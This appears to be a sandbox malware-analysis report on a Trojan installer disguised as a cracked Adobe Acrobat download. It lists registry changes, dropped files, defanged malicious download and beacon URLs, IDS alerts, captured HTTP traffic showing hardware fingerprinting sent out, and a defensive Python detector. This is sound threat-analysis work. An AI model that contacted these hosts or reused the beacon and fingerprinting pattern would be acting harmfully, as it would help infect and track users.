[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
ce4b14250ff2c67d88aea6a5dc084652 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe
ce4b14250ff2c67d88aea6a5dc084652 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe
c17103ae9072a06da581dec998343fc1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll
7caaf58a526da33c24cbe122e7839693 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll
c2c978b4b608c45c6bf61d68cdedaa0e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe
fe25dac1837e5c2586e6ad6f00963925 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe
89d40ecddf3ce6f3b0e6a84f40936912 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll
53347df513f9fea942b17dc9fa94bda7 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe
6903caeeb494cf008c1305199ffd2dc4 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 16944 17408 3.17675 edad92707850619c3a3b7019022a50b3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic=
hxxp://dxfnfnjmewlvs.cloudfront.net/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1
hxxp://di5k50sh3hqjp.cloudfront.net/get.php?ses=482796663418412224
hxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.222.174.20
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.49.84.66
hxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.222.174.20
hxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.222.174.20
hxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg 52.222.174.250
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg 52.222.174.250
hxxp://ee.wintervenepest.bid/report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575 54.88.21.193
hxxp://ee.wintervenepest.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342 54.88.21.193
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=cp&c=&step=
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M
hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M 104.18.41.31
hxxp://tobacted.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3 104.27.139.167
hxxp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=rx&c=&step=1
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 104.25.229.18
hxxp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 54.88.152.23
hxxp://players.movinfra.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
hxxp://players.movinfra.com/css/twin.css
hxxp://e6845.dscb1.akamaiedge.net/crls/secureca.crl
hxxp://e8218.dscb1.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg==
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T
hxxp://players.movinfra.com/js/main.js
hxxp://players.movinfra.com/css/fonts/font-awesome/fontawesome-webfont.eot?
hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186
hxxp://players.movinfra.com/img/favicon/cinemaden.com/favicon.ico
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png 107.20.147.93
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M 52.222.174.45
hxxp://tour.cinemaden.com/img/favicon/cinemaden.com/favicon.ico 52.205.102.180
hxxp://www.secularistsarakolet.site/index.php 107.20.147.93
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= 52.222.174.188
hxxp://get.gunnightmar.club/stats.php?bu=rx&c=&step=1 52.222.174.219
hxxp://away.yosauruslega.bid/get.php?ses=482796663418412224 52.222.174.149
hxxp://get.gunnightmar.club/stats.php?bu=cp&c=&step= 52.222.174.219
hxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.222.174.20
hxxp://tour.cinemaden.com/css/fonts/font-awesome/fontawesome-webfont.eot? 52.205.102.180
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 173.194.32.135
hxxp://g.symcd.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== 23.43.139.27
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz 173.194.44.70
hxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.222.174.20
hxxp://tour.cinemaden.com/js/main.js 52.205.102.180
hxxp://crl.geotrust.com/crls/secureca.crl 23.43.133.163
hxxp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 52.205.102.180
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T 173.194.44.70
hxxp://tour.cinemaden.com/css/twin.css 52.205.102.180
hxxp://www.google-analytics.com/analytics.js 173.194.32.135
hxxp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack 52.222.174.55
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.49.84.66
hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe 52.222.174.100
hxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 52.222.174.20
hxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 52.222.174.190
ic-dc.deliverydlcenter.com 52.222.174.140
ajax.googleapis.com 74.125.205.95
fonts.googleapis.com 173.194.222.95
fonts.gstatic.com 74.125.232.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN Backdoor User-Agent (InstallCapital)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE SoundCloud Downloader Install Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
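Three of the verdicts above key on nothing more than the User-Agent string (NSIS_Inetc, InstallCapital) or on an MZ/PE header in a response body, and the Traffic section below also shows a report.php?typ=sys beacon that ships the SMBIOS strings and MAC address of the host (chk_s_b=VMware-..., chk_c_ma=VMware, Inc., chk_mac=00:50:56:...), which is the installer fingerprinting the sandbox. The following added example (ours, not code from the Lavasoft report or from the sample) re-derives those checks over exchanges constructed from the captured requests: bodies are cut to a recognisable prefix, the spaces in the report.php target are percent-encoded so the request line parses, and the NSISDL and fingerprint rules are analyst-added heuristics rather than verdicts listed in the report.

```python
"""Re-derive several of the report's Suricata verdicts from captured HTTP exchanges.

Added example; not code from the Lavasoft report or from the sample. The
exchanges below are constructed from the request/response lines shown in the
Traffic section: bodies are cut to a recognisable prefix, and the spaces in
the report.php target are percent-encoded so the request line parses.
"""
import struct
from urllib.parse import parse_qs, urlsplit


def fake_pe_prefix() -> bytes:
    """Constructed stand-in for a downloaded PE: MZ stub, e_lfanew = 0x40, then 'PE\\0\\0'."""
    return b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 16


# (raw request text, response headers, response body prefix) -- constructed samples.
EXCHANGES = [
    ("GET /stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe HTTP/1.1\r\n"
     "User-Agent: NSIS_Inetc (Mozilla)\r\nHost: off.ncongruousric.bid\r\n",
     {"Content-Type": "application/force-download",
      "Content-Disposition": 'attachment; filename="583afdd9a9098.exe"'},
     fake_pe_prefix()),
    ("POST /installer.php?affId=1006&instId=11&v=2 HTTP/1.1\r\n"
     "Host: will.ymuscaesnortin.bid\r\nUser-Agent: InstallCapital\r\n",
     {"Content-Type": "text/html"}, b"<html>"),
    ("GET /get.php?ses=482796663418412224 HTTP/1.0\r\n"
     "Host: away.yosauruslega.bid\r\nUser-Agent: NSISDL/1.2 (Mozilla)\r\n",
     {"Content-Type": "application/octet-stream",
      "Content-disposition": 'attachment; filename="cpSetup.exe"'},
     fake_pe_prefix()),
    ("GET /analytics.js HTTP/1.1\r\nHost: VVV.google-analytics.com\r\n"
     "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n",
     {"Content-Type": "text/javascript"}, b"(function(){"),
    ("GET /report.php?typ=sys&affId=1006&chk_s_b=VMware-56%204d%2022%2096&chk_s_v=HPQOEM%20-%206040000"
     "&chk_c_ma=VMware,%20Inc.&chk_c_mo=VMware%20Virtual%20Platform&chk_mac=00:50:56:33:B5:51 HTTP/1.1\r\n"
     "User-Agent: InstallCapital\r\nHost: ee.wintervenepest.bid\r\n",
     {"Content-Type": "text/html"}, b""),
]

# Verdicts from the report's IDS list, keyed on the User-Agent substring they match.
ET_UA_RULES = {
    "NSIS_Inetc": "ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers",
    "InstallCapital": "ET TROJAN Backdoor User-Agent (InstallCapital)",
}
# Analyst-added heuristics (assumptions; not among the verdicts listed in the report).
EXTRA_UA_RULES = {"NSISDL/": "NSIS NSISdl plug-in User-Agent (NSISDL) - installer-driven download"}
VM_FINGERPRINT_KEYS = ("chk_s_b", "chk_s_v", "chk_c_ma", "chk_c_mo", "chk_mac")


def parse_request(raw: str) -> dict:
    """Split a raw request (request line plus headers) into method, target and lower-cased headers."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def is_pe_image(body: bytes) -> bool:
    """True when the body starts with an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    return body[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def vm_fingerprint_keys(target: str) -> list:
    """Names of the chk_* query parameters (SMBIOS strings, MAC) present in the request target."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [k for k in VM_FINGERPRINT_KEYS if k in params]


def scan(exchanges) -> list:
    """Return (host, verdict, detail) triples for every exchange that trips one of the checks."""
    alerts = []
    for raw_request, response_headers, body in exchanges:
        req = parse_request(raw_request)
        host = req["headers"].get("host", "?")
        ua = req["headers"].get("user-agent", "")
        disposition = {k.lower(): v for k, v in response_headers.items()}.get("content-disposition", "")
        filename = disposition.split("filename=", 1)[1].strip('"') if "filename=" in disposition else ""
        for needle, verdict in {**ET_UA_RULES, **EXTRA_UA_RULES}.items():
            if needle in ua:
                alerts.append((host, verdict, ua))
        if is_pe_image(body):
            alerts.append((host, "ET POLICY PE EXE or DLL Windows file download HTTP", filename))
        leaked = vm_fingerprint_keys(req["target"])
        if len(leaked) >= 3:
            alerts.append((host, "VM/hardware fingerprint in query string", ",".join(leaked)))
    return alerts


if __name__ == "__main__":
    for host, verdict, detail in scan(EXCHANGES):
        print(f"{host:28s} {verdict}  [{detail}]")
```

The PE check reads e_lfanew from offset 0x3C rather than grepping for "PE", so a text body that happens to contain those letters is not flagged; the fingerprint check requires three of the five chk_* keys so that a single coincidental parameter name does not alert.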

Traffic

GET hXXp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 610
Connection: close
Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:20 GMT
X-Cache: Miss from cloudfront
Via: 1.1 05e6fd312b38836c9def63a422bd7429.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vcKTRVplgIUTG_66QpD6lKWviTpBw1QE1sY0ZYnreDadUDujEcGOfA==
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>


GET /analytics.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.google-analytics.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Timing-Allow-Origin: *
Date: Sun, 27 Nov 2016 14:38:31 GMT
Expires: Sun, 27 Nov 2016 16:38:31 GMT
Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 11590
Age: 3614
Cache-Control: public, max-age=7200
[binary body not reproduced: gzip-compressed JavaScript (analytics.js), 11590 bytes]

<<< skipped >>>

GET /css/twin.css HTTP/1.1
Accept: text/css
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css
Date: Sun, 27 Nov 2016 15:38:42 GMT
ETag: W/"58372388-3b06f"
Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
transfer-encoding: chunked
Connection: keep-alive
[binary body not reproduced: gzip-compressed CSS (twin.css), chunked transfer, first chunk 0x7b54 bytes]

<<< skipped >>>

GET /css/fonts/font-awesome/fontawesome-webfont.eot? HTTP/1.1
Accept: */*
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Origin: hXXp://tour.cinemaden.com
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/vnd.ms-fontobject
Date: Sun, 27 Nov 2016 15:38:45 GMT
ETag: "57325088-10d0b"
Last-Modified: Tue, 10 May 2016 21:20:08 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 68875
Connection: keep-alive
[binary body not reproduced: Embedded OpenType font, 68875 bytes; embedded name strings "FontAwesome", "Regular", "Version 4.4.0 2015", "FontAwesome Regular"]

<<< skipped >>>

POST hXXp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 602

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Sun, 27 Nov 2016 15:38:15 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 93c5c2940efa6748481c787e7c245f82.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==
